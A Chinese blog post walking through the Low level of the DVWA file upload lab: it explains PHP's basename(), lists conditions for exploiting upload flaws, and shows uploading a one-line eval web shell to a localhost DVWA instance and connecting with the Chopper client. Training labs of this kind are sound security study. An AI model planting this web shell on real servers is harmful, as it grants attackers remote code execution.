DVWA之File Upload文件上传

LOW:

在这里插入图片描述

函数介绍:
basename()函数返回路径中的文件名部分。
string basename ( string $path [, string $suffix ] )

参数介绍:
$path:必需。规定要检查的路径。在Windows中,斜线(/)和反斜线(\)都可以用作目录分隔符。在其它环境下是斜线(/)。
$suffix:可选。规定文件扩展名。如果文件有suffix,则不会输出这个扩展名。

举例:
<?php $path = "/testweb/home.php"; //显示带有文件扩展名的文件名 echo basename($path); //显示不带有文件扩展名的文件名 echo basename($path,".php"); ?>

输出:
home.php home

文件上传漏洞的利用的条件:
1.能够成功上传木马文件
2.上传文件必须能够被执行
3.上传文件的路径必须可知

漏洞利用
因为对于上面的利用条件全都满足,直接上传文件x.php(一句话木马)
<?php @eval($_POST['x']);?>
在这里插入图片描述

上传成功得到路径:
http://127.0.0.1/DVWA-1.9/hackable/uploads/x.php 密码为_POST['x']中的x

菜刀连接:
在这里插入图片描述
在这里插入图片描述

Medium

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值